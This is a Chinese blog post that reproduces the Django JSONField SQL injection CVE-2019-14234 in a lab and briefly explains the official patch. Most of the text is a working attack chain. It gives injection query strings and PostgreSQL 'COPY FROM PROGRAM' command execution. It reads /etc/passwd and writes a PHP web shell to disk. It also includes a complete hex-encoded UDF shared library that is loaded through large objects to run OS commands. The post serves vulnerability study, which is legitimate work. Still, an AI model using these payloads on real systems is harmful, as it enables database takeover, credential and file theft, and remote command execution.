avatar

目录
CVE-2019-14234 复现挖坑

Django 1.11.x(1.11.23之前),2.1.x(2.1.11之前)和2.2.x(2.2.4之前)中发现了一个问题。 由于shallow key转换中的错误,django.contrib.postgres.fields.JSONField 的关键字和索引查找以及 django.contrib.postgres.fields.HStoreField 的关键字查找受到SQL注入。

例如,可以通过在 key 或索引名称中使用 OR 1 = 1来利用漏洞,使用特制的字典并通过字典扩展将所有记录返回给** kwarg,以将所有记录返回给 QuerySet.filter() 功能。

漏洞修复

首先先来看一下官方的修复措施
Fixed #30664

test

django/db/backends/postgresql/schema.py 中,利用 strip_quotes() 函数封装,将传递的字符串中的 ' (引号) 删除,返回移除字符串头尾指定的字符生成的新字符串,进行传参。


Fixed #30769

test

然后将 django/contrib/postgres/fields/hstore.py 文件里面的 KeyTransform类as_sql 函数中的直接传递字符串改为了将 self.key_name 单独使用数组进行传递,其中 %% 的意思为 转换说明符,其主要作用为直接转化为单个 % 符号而不需要参数。类似于 \\\

shell
1
2
3
4
5
6
7
In[1]: "%%"%()
Out[1]: '%'

# 具体使用方法如下

In [2]: '%s %%s'%'test'
Out[2]: 'test %s'

再看下一个

test

django/contrib/postgres/fields/jsonb.py 文件中将对 self.key_name 变量的返回统一改成了使用数组进行转换。并且后期在单元测试中加入了对 JSONField的SQL注入测试


靶场复现

p神流批!

进入 http://ip:port/admin/vuln/collection/
传参

Code
1
?detail__a%27b=1

会显示将 ' 包括进去

test

说明可以构建查询字段

Code
1
2
3
4
5
6
7
8
id_contains=admin
name_contains=admin
flag_contains=flag{

?detail__author'+=+'"a"')--
?detail__author%27+%3d+%27"a"%27)%20and%207778%3dCAST((SELECT%20version())%20AS%20NUMERIC)--
?detail__author'%3f'a') OR 1%3d2%20 -- OR%20 ("vuln_collection"."detail" -> 'detail
?detail__author'%3f'a') OR 1%3d2%20 %3bCREATE table cmd_exec(cmd_output text) -- OR%20 ("vuln_collection"."detail" -> 'detail
sql
1
2
3
4
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

切割脚本

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#-*- coding:utf-8 -*-
import sys

if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:python " + sys.argv[0] + "inputfile"
sys.exit()
fileobj = open(sys.argv[1],'rb')
i = 0
for b in fileobj.read():
sys.stdout.write(r'{:02x}'.format(ord(b)))
i = i + 1
if i % 2048 == 0:
print "\n"
fileobj.close()

PostgreSQL 是一个自由的对象-关系数据库服务器(数据库管理系统)

在root权限下修改数据库密码

bash
1
2
3
4
5
service postgresql start	//启动服务
su postgres #切换到数据库用户下
psql postgres #进入数据库
alter user postgres with password 'postgres' #修改数据库的密码为:postgres
psql -h 127.0.0.1 -U postgres -W 使用帐号密码登入系统

查看数据中的信息

sql
1
2
3
4
\l  #列出数据库
\du #列出数据库的用户
select pg_ls_dir('./'); #列出系统目录列表(不能是绝对路径)
select pg_read_file('postgresql.auto.conf', 0, 200); #读取系统文件

使用数据库获取系统信息

sql
1
2
3
4
5
drop table pwn;
create table pwn(t TEXT);
copy pwn from '/etc/passwd';
select *from pwn limit 1 offset 0;
drop table pwn;

使用数据库写文件

sql
1
2
3
4
5
6
7
8
9
drop table pwn;
create table pwn (t TEXT);
insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');
select * from pwn;
copy pwn(t) to '/tmp/cmd.php';
drop table pwn;

# 或者
copy (select '<?php phpinfo();?>') to '/tmp/1.php';

使用数据库执行系统命令

执行系统命令需要用到 udf库,(这个有点类似mysql 提权)
创建 .so,执行自己需要用的命令

sql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
SELECT lo_create(12345);
INSERT INTO pg_largeobject VALUES (12345, 0, decode('7f454c4602010100000000000000000003003e0001000000d00d0000000000004000000000000000f82e0000000000000000000040003800070040001d001a000100000005000000000000000000000000000000000000000000000000000000fc16000000000000fc1600000000000000002000000000000100000006000000001e000000000000001e200000000000001e200000000000e002000000000000e80200000000000000002000000000000200000006000000181e000000000000181e200000000000181e200000000000c001000000000000c00100000000000008000000000000000400000004000000c801000000000000c801000000000000c80100000000000024000000000000002400000000000000040000000000000050e5746404000000ec14000000000000ec14000000000000ec140000000000006c000000000000006c00000000000000040000000000000051e574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000052e5746404000000001e000000000000001e200000000000001e200000000000000200000000000000020000000000000100000000000000040000001400000003000000474e5500bc18d001b8d1db33f56f9fa1d194c131375c6a5c00000000030000001d00000002000000070000008440030810890c99880c008dc84400001d0000002400000029000000325e541ea868be124245d5ec2e67541eaa5fbe12bae3927c5f4de3214aad229d32a1f45bd871581cb88df10e25681b32c60da6d4ead3ef0e6637d3ed339268fe000000000000000000000000000000000000000000000000000000000000000003000900100c0000000000000000000000000000ec00000012000000000000000000000000000000000000001101000012000000000000000000000000000000000000001c00000020000000000000000000000000000000000000008401000012000000000000000000000000000000000000007d0100001200000000000000000000000000000000000000ba00000012000000000000000000000000000000000000008a0100001200000000000000000000000000000000000000480100001200000000000000000000000000000000000000e400000012000000000000000000000000000000000000001f01000012000000000000000000000000000000000000001901000012000000000000000000000000000000000000007701000012000000000000000000000000000000000000000100000020000000000000000000000000000000000000009f0000001200000000000000000000000000000000000000d300000010000000000000000000000000000000000000009800000012000000000000000000000000000000000000007101000012000000000000000000000000000000000000000901000012000000000000000000000000000000000000004d01000012000000000000000000000000000000000000000301000012000000000000000000000000000000000000006b0100001200000000000000000000000000000000000000400100001200000000000000000000000000000000000000610000002000000000000000000000000000000000000000380000002000000000000000000000000000000000000000520000002200000000000000000000000000000000000000eb00000010000000000000000000000000000000000000003b0100001200000000000000000000000000000000000000f100000012000c0031100000000000000d00000000000000ca00000012000c00bc0f0000000000007500000000000000a501000010001700e0202000000000000000000000000000c100000012000c00af0f0000000000000d00000000000000fa00000012000c003e100000000000002201000000000000b801000010001800e82020000000000000000000000000005e01000012000c007a1200000000000024020000000000002601000012000c0060110000000000000d000000000000008300000012000c00dd0e0000000000006200000000000000ac01000010001800e02020000000000000000000000000001000000012000900100c00000000000000000000000000002f01000012000c006d1100000000000000010000000000007500000012000c00d00e0000000000000d000000000000001600000012000d00a01400000000000000000000000000005501000012000c006d120000000000000d00000000000000a600000012000c003f0f0000000000007000000000000000005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c61737365730050675f6d616769635f66756e6300746578745f7074725f746f5f636861725f707472006d616c6c6f63006d656d637079006368725f7074725f746f5f746578745f707472007374726c656e0070675f66696e666f5f7379735f657865630070675f6465746f6173745f646174756d0073797374656d0070667265650070675f66696e666f5f7379735f6576616c00706f70656e007265616c6c6f63007374726e6370790066676574730070636c6f73650070675f66696e666f5f7379735f62696e6576616c00666f726b00737973636f6e66006d6d617000776169747069640070675f66696e666f5f7379735f66696c657265', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 1, decode('616400666f70656e00667365656b006674656c6c0066636c6f7365006672656164005f5f737461636b5f63686b5f6661696c006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e313400474c4942435f322e3400474c4942435f322e322e3500000000000200020000000200020002000300020002000200020002000000040000000200020002000200020002000200000000000200000002000100010001000100010001000100010001000100010001000100010001000100010003009b01000010000000000000009491960600000400bd010000100000001469690d00000300c801000010000000751a690900000200d201000000000000001e2000000000000800000000000000a00e000000000000081e2000000000000800000000000000600e000000000000d8202000000000000800000000000000d820200000000000d81f20000000000006000000040000000000000000000000e01f200000000000060000000e0000000000000000000000e81f20000000000006000000180000000000000000000000f01f20000000000006000000190000000000000000000000f81f200000000000060000001a00000000000000000000001820200000000000070000000200000000000000000000002020200000000000070000000300000000000000000000002820200000000000070000000500000000000000000000003020200000000000070000000600000000000000000000003820200000000000070000000700000000000000000000004020200000000000070000000800000000000000000000004820200000000000070000000900000000000000000000005020200000000000070000000a00000000000000000000005820200000000000070000000b00000000000000000000006020200000000000070000000c00000000000000000000006820200000000000070000002500000000000000000000007020200000000000070000000d00000000000000000000007820200000000000070000000f0000000000000000000000802020000000000007000000100000000000000000000000882020000000000007000000110000000000000000000000902020000000000007000000120000000000000000000000982020000000000007000000130000000000000000000000a02020000000000007000000140000000000000000000000a82020000000000007000000150000000000000000000000b02020000000000007000000160000000000000000000000b82020000000000007000000170000000000000000000000c020200000000000070000001b0000000000000000000000c820200000000000070000001c0000000000000000000000d020200000000000070000002c00000000000000000000004883ec08488b05c51320004885c07405e89b0100004883c408c3000000000000ff35d2132000ff25d41320000f1f4000ff25d21320006800000000e9e0ffffffff25ca1320006801000000e9d0ffffffff25c21320006802000000e9c0ffffffff25ba1320006803000000e9b0ffffffff25b21320006804000000e9a0ffffffff25aa1320006805000000e990ffffffff25a21320006806000000e980ffffffff259a1320006807000000e970ffffffff25921320006808000000e960ffffffff258a1320006809000000e950ffffffff2582132000680a000000e940ffffffff257a132000680b000000e930ffffffff2572132000680c000000e920ffffffff256a132000680d000000e910ffffffff2562132000680e000000e900ffffffff255a132000680f000000e9f0feffffff25521320006810000000e9e0feffffff254a1320006811000000e9d0feffffff25421320006812000000e9c0feffffff253a1320006813000000e9b0feffffff25321320006814000000e9a0feffffff252a1320006815000000e990feffffff25221320006816000000e980feffffff251a1320006817000000e970feffffff251a1220006690ff252a1220006690488d3d09132000488d0509132000554829f84889e54883f80e7615488b05e61120004885c074095dffe0660f1f4400005dc30f1f4000662e0f1f840000000000488d3dc9122000488d35c2122000554829fe4889e548c1fe034889f048c1e83f4801c648d1fe7418488b05b11120004885c0740c5dffe0660f1f8400000000005dc30f1f4000662e0f1f840000000000803d7912200000752748833d8711200000554889e5740c488b3d5a122000e845ffffffe848ffffff5dc6055012200001f3c30f1f4000662e0f1f840000000000488d3d690f200048833f00750be95effffff660f1f440000488b05291120004885c074e9554889e5ffd05de940ffffff554889e5488d05e50500005dc3554889e54883ec2048897de8488b45e88b00c1e80283e8048945f48b45f483c00148984889c7e818feffff488945f88b45f44863d0488b45e8488d4804488b45f84889ce4889c7e8d7fdffff8b45f44863d0488b45f84801d0c60000488b45f8c9c3554889e54883ec2048897de8488b45e84889c7e829fdffff4883c0044889c7e8bdfdffff488945f8488b45e84889c7e80dfdffff83c0048d148500000000488b45f88910488b45e84889c7e8f1fcffff4889c2488b45f8488d4804488b45e84889c64889cfe857fdffff488b45f8c9c3554889e5488d05220500005dc3554889e54883ec3048897dd8488b45d8488b40204889c7e838fdffff488945f0c745ec00000000488b45f04889c7e8f1fcffff488945f8488b45f84889c7e8b1fcffff89', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 2, decode('45ec488b45f84889c7e832fcffff488b45d8488b4020483b45f0740c488b45f04889c7e868fdffff8b45ec489889c0c9c3554889e5488d05a40400005dc3554889e54883ec5048897db8488b45b8488b40204889c7e8b6fcffff488945d8488b45d84889c7e876fcffff488945e0bf00040000e8a8fcffff488945e8bf01000000e89afcffff488945d0c745c800000000488b45d0c60000488b45e0488d350d0400004889c7e8b5fcffff488945f0eb55488b45e84889c7e8c3fbffff8945cc8b55c88b45cc01d04863d0488b45d04889d64889c7e866fcffff488945d08b45cc4863d08b45c84863c8488b45d04801c1488b45e84889c64889cfe850fbffff8b45cc0145c8488b55f0488b45e8be080000004889c7e8b5fbffff4885c07591488b45f04889c7e894fbffff488b45d00fb60084c074138b45c84898488d50ff488b45d04801d0c60000488b45d04889c7e85afcffff488945f8488b45f8c9c3554889e5488d05790300005dc3554889e54883ec4048897dc8488b45c8488b40204889c7e887fbffff488945e0488b45e08b00c1e80283e8048945d88b45d84898488945e8e8f6fbffff8945dc837ddc00790ab801000000e9ae000000837ddc000f8585000000bf1e000000e8affbffff4883e801488945f0488b55e8488b45f04801c2488b45f048f7d04821d0488945f0488b45f041b90000000041b800000000b921000000ba070000004889c6bf00000000e887faffff488945f848837df8ff7507b801000000eb40488b45e0488d4804488b55e8488b45f84889ce4889c7e80afaffff488b45f8ffd0837ddc007e148b45dcba01000000be0000000089c7e8eafaffffb800000000c9c3554889e5488d05700200005dc3554889e54883ec7048897d9864488b042528000000488945f831c0488b4598488b40204889c7e86bfaffff488945b048b83031323334353637488945e048b83839414243444546488945e8c645f000488b45b04889c7e80bfaffff488945b8488b45b8488d35ce0100004889c7e884faffff488945c048837dc0007512488b4598c6401c01b800000000e97f010000488b45c0ba02000000be000000004889c7e811faffff488b45c04889c7e8c5f9ffff8945ac488b45c0ba00000000be000000004889c7e8ecf9ffff8b45ac83c00148984889c7e8ccf9ffff488945c848837dc800751e488b45c04889c7e805f9ffff488b4598c6401c01b800000000e90b0100008b45ac4863f0488b55c0488b45c84889d1ba010000004889c7e8c5f8ffff488b45c04889c7e8c9f8ffff8b45ac01c083c00148984889c7e867f9ffff488945d0c745a400000000c745a800000000eb6b8b45a88d50018955a84863d0488b45d04801c28b45a44863c8488b45c84801c80fb600c0f8040fbec083e00f48980fb64405e088028b45a88d50018955a84863d0488b45d04801c28b45a44863c8488b45c84801c80fb6000fbec083e00f48980fb64405e088028345a4018b45a43b45ac7c8d8b45a84863d0488b45d04801d0c60000488b45d04889c7e854f9ffff488945d8488b45d04889c7e8d4f7ffff488b45c84889c7e8c8f7ffff488b45b84889c7e8bcf7ffff488b45d8488b4df86448330c25280000007405e8f4f7ffffc9c300004883ec084883c408c300000000000000720072620000000000000000000000001c0000008a030000640000002000000040000000010000000100000001000000010000000100000001000000011b033b680000000c00000044f7ffff84000000e4f9ffffac000000f1f9ffffcc00000053faffffec000000c3faffff0c010000d0faffff2c01000045fbffff4c01000052fbffff6c01000074fcffff8c01000081fcffffac01000081fdffffcc0100008efdffffec0100001400000000000000017a5200017810011b0c070890010000240000001c000000b8f6ffff90010000000e10460e184a0f0b770880003f1a3b2a332422000000001c0000004400000030f9ffff0d00000000410e108602430d06480c07080000001c000000640000001df9ffff6200000000410e108602430d06025d0c070800001c000000840000005ff9ffff7000000000410e108602430d06026b0c070800001c000000a4000000aff9ffff0d00000000410e108602430d06480c07080000001c000000c40000009cf9ffff7500000000410e108602430d0602700c070800001c000000e4000000f1f9ffff0d00000000410e108602430d06480c07080000001c00000004010000def9ffff2201000000410e108602430d06031d010c0708001c00000024010000e0faffff0d00000000410e108602430d06480c07080000001c00000044010000cdfaffff0001000000410e108602430d0602fb0c070800001c00000064010000adfbffff0d00000000410e108602430d06480c07080000001c000000840100009afbffff2402000000410e108602430d06031f020c070800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 3, decode('000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a00e000000000000600e000000000000000000000000000001000000000000009b010000000000000c00000000000000100c0000000000000d00000000000000a0140000000000001900000000000000001e2000000000001b0000000000000008000000000000001a00000000000000081e2000000000001c000000000000000800000000000000f5feff6f00000000f00100000000000005000000000000009806000000000000060000000000000060020000000000000a00000000000000de010000000000000b0000000000000018000000000000000300000000000000002020000000000002000000000000004002000000000000140000000000000007000000000000001700000000000000d009000000000000070000000000000010090000000000000800000000000000c00000000000000009000000000000001800000000000000feffff6f00000000d008000000000000ffffff6f000000000100000000000000f0ffff6f000000007608000000000000f9ffff6f000000000300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 4, decode('181e20000000000000000000000000000000000000000000460c000000000000560c000000000000660c000000000000760c000000000000860c000000000000960c000000000000a60c000000000000b60c000000000000c60c000000000000d60c000000000000e60c000000000000f60c000000000000060d000000000000160d000000000000260d000000000000360d000000000000460d000000000000560d000000000000660d000000000000760d000000000000860d000000000000960d000000000000a60d000000000000b60d000000000000d8202000000000004743433a20285562756e747520352e342e302d367562756e7475317e31362e30342e31312920352e342e30203230313630363039000000000000000000000000000000000000000000000000000000000000000003000100c80100000000000000000000000000000000000003000200f00100000000000000000000000000000000000003000300600200000000000000000000000000000000000003000400980600000000000000000000000000000000000003000500760800000000000000000000000000000000000003000600d00800000000000000000000000000000000000003000700100900000000000000000000000000000000000003000800d00900000000000000000000000000000000000003000900100c00000000000000000000000000000000000003000a00300c00000000000000000000000000000000000003000b00c00d00000000000000000000000000000000000003000c00d00d00000000000000000000000000000000000003000d00a01400000000000000000000000000000000000003000e00b01400000000000000000000000000000000000003000f00ec1400000000000000000000000000000000000003001000581500000000000000000000000000000000000003001100001e20000000000000000000000000000000000003001200081e20000000000000000000000000000000000003001300101e20000000000000000000000000000000000003001400181e20000000000000000000000000000000000003001500d81f20000000000000000000000000000000000003001600002020000000000000000000000000000000000003001700d82020000000000000000000000000000000000003001800e0202000000000000000000000000000000000000300190000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000001001300101e20000000000000000000000000001900000002000c00d00d00000000000000000000000000001b00000002000c00100e00000000000000000000000000002e00000002000c00600e00000000000000000000000000004400000001001800e02020000000000001000000000000005300000001001200081e20000000000000000000000000007a00000002000c00a00e00000000000000000000000000008600000001001100001e2000000000000000000000000000a50000000400f1ff00000000000000000000000000000000bd00000001000e00c0140000000000001c00000000000000d000000001000e00dc140000000000000400000000000000de00000001000e00e0140000000000000400000000000000ec00000001000e00e4140000000000000400000000000000fa00000001000e00e8140000000000000400000000000000010000000400f1ff000000000000000000000000000000000801000001001000f81600000000000000000000000000001601000001001300101e2000000000000000000000000000000000000400f1ff000000000000000000000000000000002201000001001700d82020000000000000000000000000002f01000001001400181e20000000000000000000000000003801000000000f00ec1400000000000000000000000000004b01000001001700e02020000000000000000000000000005701000001001600002020000000000000000000000000006d01000012000000000000000000000000000000000000007f01000012000c00d00e0000000000000d000000000000008d0100001200000000000000000000000000000000000000a20100002000000000000000000000000000000000000000be01000012000c0060110000000000000d00000000000000d301000012000c0031100000000000000d00000000000000e501000012000000000000000000000000000000000000009f02000012000c00bc0f0000000000007500000000000000f801000010001700e0202000000000000000000000000000ff01000012000000000000000000000000000000000000001302000012000d00a01400000000000000000000000000001902000012000000000000000000000000000000000000002d02000012000000000000000000000000000000000000004902000012000000000000000000000000000000000000005b02000012000000000000000000000000000000000000006f02000012000000000000000000000000000000000000008302000012000000000000000000000000000000000000009602000012000c00af0f0000000000000d00000000000000a802000012000c00dd0e0000000000006200000000000000dc01000012000c003e100000000000002201000000000000bd0200001200000000000000000000000000000000000000d00200002000000000000000000000000000000000000000df0200001200000000000000000000000000000000000000f2020000100000000000000000000000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 5, decode('00000000000000000303000012000000000000000000000000000000000000001703000010001800e82020000000000000000000000000001c03000012000000000000000000000000000000000000002f03000012000000000000000000000000000000000000004403000010001800e02020000000000000000000000000005003000012000000000000000000000000000000000000006503000012000000000000000000000000000000000000007803000012000000000000000000000000000000000000008b0300001200000000000000000000000000000000000000a00300002000000000000000000000000000000000000000b403000020000000000000000000000000000000000000001104000012000c007a120000000000002402000000000000ce0300002200000000000000000000000000000000000000ea03000012000900100c0000000000000000000000000000f00300001000000000000000000000000000000000000000c701000012000c006d110000000000000001000000000000f603000012000000000000000000000000000000000000000804000012000c006d120000000000000d000000000000001e04000012000c003f0f00000000000070000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e37353934005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e747279006c69625f706f737467726573716c7564665f7379732e630050675f6d616769635f646174612e35383133006d795f66696e666f2e35383331006d795f66696e666f2e35383436006d795f66696e666f2e35383639006d795f66696e666f2e35383838005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f64736f5f68616e646c65005f44594e414d4943005f5f474e555f45485f4652414d455f484452005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f00667265654040474c4942435f322e322e350050675f6d616769635f66756e63007374726e6370794040474c4942435f322e322e35005f49544d5f64657265676973746572544d436c6f6e655461626c650070675f66696e666f5f7379735f62696e6576616c0070675f66696e666f5f7379735f6576616c0066726561644040474c4942435f322e322e35005f65646174610066636c6f73654040474c4942435f322e322e35005f66696e69007374726c656e4040474c4942435f322e322e35005f5f737461636b5f63686b5f6661696c4040474c4942435f322e34006d6d61704040474c4942435f322e322e350073797374656d4040474c4942435f322e322e350070636c6f73654040474c4942435f322e322e350066676574734040474c4942435f322e322e350070675f66696e666f5f7379735f6578656300746578745f7074725f746f5f636861725f707472006674656c6c4040474c4942435f322e322e35005f5f676d6f6e5f73746172745f5f006d656d6370794040474c4942435f322e31340070675f6465746f6173745f646174756d006d616c6c6f634040474c4942435f322e322e35005f656e6400667365656b4040474c4942435f322e322e35007265616c6c6f634040474c4942435f322e322e35005f5f6273735f737461727400776169747069644040474c4942435f322e322e3500706f70656e4040474c4942435f322e322e3500666f70656e4040474c4942435f322e322e3500737973636f6e664040474c4942435f322e322e35005f4a765f5265676973746572436c6173736573005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e35005f696e697400706672656500666f726b4040474c4942435f322e322e350070675f66696e666f5f7379735f66696c6572656164006368725f7074725f746f5f746578745f70747200002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e706c742e676f74002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b000000070000000200000000000000c801000000000000c80100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000f001000000000000f0010000000000006c00000000000000030000000000000008000000000000000000000000000000380000000b00000002000000000000006002000000000000600200000000000038040000000000000400000002000000080000000000000018000000000000004000000003000000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 6, decode('020000000000000098060000000000009806000000000000de0100000000000000000000000000000100000000000000000000000000000048000000ffffff6f0200000000000000760800000000000076080000000000005a0000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000d008000000000000d00800000000000040000000000000000400000001000000080000000000000000000000000000006400000004000000020000000000000010090000000000001009000000000000c0000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000d009000000000000d009000000000000400200000000000003000000160000000800000000000000180000000000000078000000010000000600000000000000100c000000000000100c0000000000001a0000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000300c000000000000300c00000000000090010000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000c00d000000000000c00d000000000000100000000000000000000000000000000800000000000000000000000000000087000000010000000600000000000000d00d000000000000d00d000000000000ce060000000000000000000000000000100000000000000000000000000000008d000000010000000600000000000000a014000000000000a014000000000000090000000000000000000000000000000400000000000000000000000000000093000000010000000200000000000000b014000000000000b0140000000000003c000000000000000000000000000000100000000000000000000000000000009b000000010000000200000000000000ec14000000000000ec140000000000006c00000000000000000000000000000004000000000000000000000000000000a900000001000000020000000000000058150000000000005815000000000000a401000000000000000000000000000008000000000000000000000000000000b30000000e0000000300000000000000001e200000000000001e0000000000000800000000000000000000000000000008000000000000000000000000000000bf0000000f0000000300000000000000081e200000000000081e0000000000000800000000000000000000000000000008000000000000000000000000000000cb000000010000000300000000000000101e200000000000101e0000000000000800000000000000000000000000000008000000000000000000000000000000d0000000060000000300000000000000181e200000000000181e000000000000c00100000000000004000000000000000800000000000000100000000000000082000000010000000300000000000000d81f200000000000d81f0000000000002800000000000000000000000000000008000000000000000800000000000000d900000001000000030000000000000000202000000000000020000000000000d800000000000000000000000000000008000000000000000800000000000000e2000000010000000300000000000000d820200000000000d8200000000000000800000000000000000000000000000008000000000000000000000000000000e8000000080000000300000000000000e020200000000000e0200000000000000800000000000000000000000000000001000000000000000000000000000000ed0000000100000030000000000000000000000000000000e0200000000000003500000000000000000000000000000001000000000000000100000000000000110000000300000000000000000000000000000000000000022e000000000000f6000000000000000000000000000000010000000000000000000000000000000100000002000000000000000000000000000000000000001821000000000000b8080000000000001c0000003200000008000000000000001800000000000000090000000300000000000000000000000000000000000000d0290000000000003204000000000000000000000000000001000000000000000000000000000000', 'hex'));

SELECT lo_export(12345, '/tmp/udf.so');
SELECT lo_unlink(12345);
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/udf.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE; #执行命令
select sys_eval('id');
drop function sys_eval(text); #删除函数

瞎扯一会

这个CVE还有很多要学习的,先挖个坑,后面去花些时间了解一下 jsonField
(ps: 自己挖的坑越来越多了)

开学了,每天最近因为一些新的考研政策出台,搞得自己有些焦虑急躁,慢慢静下心来好好准备吧。


参考

CVE-2019-14234 Django JSON SQL注入 分析
Django JSONField SQL注入漏洞(CVE-2019-14234)分析与影响
CVE-2019-14234笔记

文章作者: 晓黑
文章链接: https://www.suk1.top/2020/02/18/CVE_2019_14234/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Manayakko - 微笑才是王道
打赏
  • 微信
    微信